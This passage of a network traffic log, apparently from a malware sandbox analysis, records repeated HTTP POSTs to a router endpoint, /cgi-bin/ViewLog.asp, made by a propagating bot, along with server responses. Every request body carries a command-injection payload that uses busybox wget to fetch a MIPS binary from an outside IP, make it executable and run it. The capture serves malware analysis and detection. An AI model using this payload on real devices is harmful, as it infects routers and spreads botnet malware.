                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:24.424204111 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:42.855423927 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:19.717856884 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              32192.168.2.144768031.211.234.1148080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:06.889904976 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:07.086596012 CET328INHTTP/1.0 200 OK
                                              Server: httpd/2.0
                                              x-frame-options: SAMEORIGIN
                                              x-xss-protection: 1; mode=block
                                              Date: Thu, 23 Nov 2023 04:15:06 GMT
                                              Content-Type: text/html
                                              Connection: close
                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 73 63 72 69 70 74 3e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 2f 4d 61 69 6e 5f 4c 6f 67 69 6e 2e 61 73 70 27 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 48 45 41 44 3e 3c 2f 48 54 4d 4c 3e 0a
                                              Data Ascii: <HTML><HEAD><script>top.location.href='/Main_Login.asp';</script></HEAD></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              33192.168.2.145295894.120.19.978080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:06.916302919 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              34192.168.2.144769031.211.234.1148080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:07.276688099 CET388INHTTP/1.0 400 Bad Request
                                              Server: httpd/2.0
                                              x-frame-options: SAMEORIGIN
                                              x-xss-protection: 1; mode=block
                                              Date: Thu, 23 Nov 2023 04:15:07 GMT
                                              Content-Type: text/html
                                              Connection: close
                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                              Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              35192.168.2.143617031.136.87.1258080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:09.356060028 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:09.928776979 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:11.080810070 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:13.416630030 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:18.024575949 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:27.240138054 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:46.951221943 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:23.813700914 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              36192.168.2.145821685.10.130.1008080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:09.538434029 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:09.714034081 CET537INHTTP/1.1 404 Not Found
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, PATCH, PUT, DELETE
                                              Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept, Authorization, X-User-Agent
                                              Content-Type: application/json; charset=utf-8
                                              Content-Length: 58
                                              ETag: W/"3a-3nurlhN7oh6/KE2okfzii7JXEms"
                                              Date: Thu, 23 Nov 2023 04:15:09 GMT
                                              Connection: keep-alive
                                              Keep-Alive: timeout=5
                                              Data Raw: 7b 22 73 74 61 74 75 73 22 3a 34 30 34 2c 22 6d 65 73 73 61 67 65 22 3a 22 54 68 69 73 20 70 61 67 65 20 64 6f 65 73 6e 27 74 20 73 65 65 6d 20 74 6f 20 65 78 69 73 74 22 7d
                                              Data Ascii: {"status":404,"message":"This page doesn't seem to exist"}


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              37192.168.2.145812285.25.210.798080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:09.543487072 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:09.727888107 CET200INHTTP/1.1 307 Temporary Redirect
                                              Location: /containers/
                                              Date: Thu, 23 Nov 2023 04:15:09 GMT
                                              Content-Length: 0
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              38192.168.2.144021862.134.71.2468080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:09.556377888 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              39192.168.2.145242494.120.18.1948080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:09.935765028 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              40192.168.2.144024662.134.71.2468080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:11.386074066 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:12.488692999 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              41192.168.2.145751094.124.49.618080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:12.584187984 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:13.608653069 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:14.792572021 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:17.256474018 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:22.120366096 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
